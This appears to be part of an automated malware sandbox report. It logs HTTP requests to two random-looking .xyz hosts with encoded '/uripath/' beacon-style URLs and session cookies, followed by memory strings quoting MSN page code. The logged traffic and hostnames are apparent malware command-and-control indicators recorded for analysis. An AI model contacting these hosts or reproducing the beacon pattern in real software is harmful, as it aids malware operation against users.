            Source: global trafficHTTP traffic detected: GET /public/css/cs-skin-elastic.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/scss/style.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/font-awesome.min.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/flag-icon.min.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/vendor/jquery-2.1.4.min.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/plugins.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/main.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/lib/chart-js/Chart.bundle.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/dashboard.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/lib/vector-map/jquery.vmap.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/widgets.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/animate.css HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/lib/vector-map/jquery.vmap.min.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/lib/vector-map/jquery.vmap.sampledata.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/scripts/lib/vector-map/country/jquery.vmap.world.js?1234 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/fonts/fontawesome-webfont.eot? HTTP/1.1Accept: */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoOrigin: http://qtrweyuiopolkhgbjune.xyzAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /uripath/rfHWC41tNETdeQWjswyCogx/2GerTeq_2F/pTrbfZqC3HbPx0AC8/8PvaEEyqSBMQ/OI0eVJ5ixCL/pKmLDsx5jBT2dg/mYyZQFsej_2FmIk9ENFo_/2FKyKN8X1y1Qj4qv/wg_2F6DT_2F1UtB/x8hTbCqg1pGLyNEs7B/hxe_2BGbh/vaZctqoLB_2FhX3rnLtN/P_2BNdyaBZpb9Iw/e46aWlZ.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5
            Source: global trafficHTTP traffic detected: GET /uripath/HqAo_2FUT4Xi/etL7dOp10vF/1GZyviLFWjPlf_/2BpAjw1ynkMPMDMMcYEtk/PA3gWZ6idqjWSLO2/tLBqz9Srim1lIVY/5tdrShzt_2BFOk6kl4/GBF65Elv2/jlbxEfm8sICAzKhFfPjq/z6q_2BXgoZz8JSHl_2B/tocJ3oanhySIXVOUDqLTzc/gtzDn0U7CVT5W/Ac4C1A3B/UCHp.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5
            Source: global trafficHTTP traffic detected: GET /uripath/r_2F625JF8nc/Zl6uqWI71P7/1DbizOipbgp9jM/hoB3nCCm3H0vpt3zAF7ZH/8VqEosOuwdbePRdf/StMEJ1jUOGHfHEi/pbLUMmGyYI_2Be3yat/brD7T_2FB/930tZX_2FxZVxCKfUYGT/aDp_2BT47EhB9UDw1DB/hN77lZDfez35Qm0pV5OWyA/VPR3gJDQb_2Bv/hnrYY6jX/Ezib7z.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5
            Source: global trafficHTTP traffic detected: GET /uripath/m5zigbEwtRm5tbWTabSv7yN/5eir_2B9Vh/aKk3WnUnFcJEuyyua/ARiRkfJ3iFIQ/qDBnAv2igfa/mrhLian2LW_2B2/9OpQEW7r1oH5EbxzNz_2F/uyLCbd56_2B8viYh/NcE_2BN0hWhdn2k/S_2Fl0s3iSHGBIpV8q/3IvuuTvjE/P_2F5A01dnuye77sW1fw/lxHUAcZiiGEaGlB/coOMe.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4
            Source: global trafficHTTP traffic detected: GET /uripath/6vBwf5Sg/63VGZHA406Wp7f7jlCy24r7/UcVh3uhwQE/xWtNLCfmK_2BTsac6/ArGABH2W0G6j/WfqTbsJQTba/CiBiWBgWSqTJgQ/xptP7CraLrAbQV2a328U6/OIbDC5s3reaQL_2B/Y7eCj60Y1Ow88q_/2BBTjMmJFlG6kKHmUH/yY9UzhV3h/GbsY7tbpKX36R072CGX4/j_2BaX.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4
            Source: global trafficHTTP traffic detected: GET /uripath/sB8E3aa3L/XDVMq5XKI78tf7sk_2Ff/1uvfkmsySV_2FdyZgAj/rQ7fjQTkCIckO00r17I0Lb/mtwt35TqG8tZy/mDnNoNxk/Tgh2dt2Vdy7GhBOSvB_2FwH/whrBYKDwkz/dpBP4WwDQ4nBFUaXC/fkbG1qJ1BjcB/GFGY_2BTrZf/_2FHH5bo5ZfTaU/YDRNOIWU58cOT9TUrLoQ2/O_2FM.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4
            Source: global trafficHTTP traffic detected: GET /uripath/KJMFCR14UUr6TEcubLP/YbwPQTJxsUT84fW9igai2d/bBa3TsKL_2Fa7/jinWy1FQ/8hLJpFNPh1lTrschK6tvg49/PN4MiR4BEw/zPC9ul5MXldDAsMjb/tYN0UMhBuQCG/Dn0m_2F5tMD/2m07HiCuV5qocF/xpBR5CxDFeZdx3DU3M_2F/v6GRyvheQQ6w1NGD/Y_2BGn0XLTzC5lH/1f16WdgZV/Ygn1e5PVT/WIV.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4
            Source: de-ch[1].htm.7.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
            Source: gtm[1].js.12.drString found in binary or memory: "arg1":"https:\/\/www.facebook.com\/mail.com" equals www.facebook.com (Facebook)
            Source: de-ch[1].htm.7.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
            Source: potec.core.min[1].js.12.drString found in binary or memory: eh=function(){var a=z.O(U('\x3cdiv class\x3d"mod-konami"\x3e\x3cdiv class\x3d"vd"\x3e\x3ciframe width\x3d"640" height\x3d"360" src\x3d"https://www.youtube.com/embed/SrLZgP-OR6s" frameborder\x3d"0" allowfullscreen\x3e\x3c/iframe\x3e\x3cdiv class\x3d"close"\x3e\x3c/div\x3e\x3c/div\x3e\x3c/div\x3e').toString());z.O("body").append(a);var b=z.O(".mod-konami");b.width();b.find(".close").b("click",function(){function a(){b.removeNode()}z.T(b,"show");window.Modernizr.csstransitions||a();b.b("transitionend", equals www.youtube.com (Youtube)
            Source: 52-478955-68ddb2ab[1].js.7.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
            Source: de-ch[1].htm.7.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
            Source: 52-478955-68ddb2ab[1].js.7.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
            Source: 52-478955-68ddb2ab[1].js.7.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
            Source: 52-478955-68ddb2ab[1].js.7.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
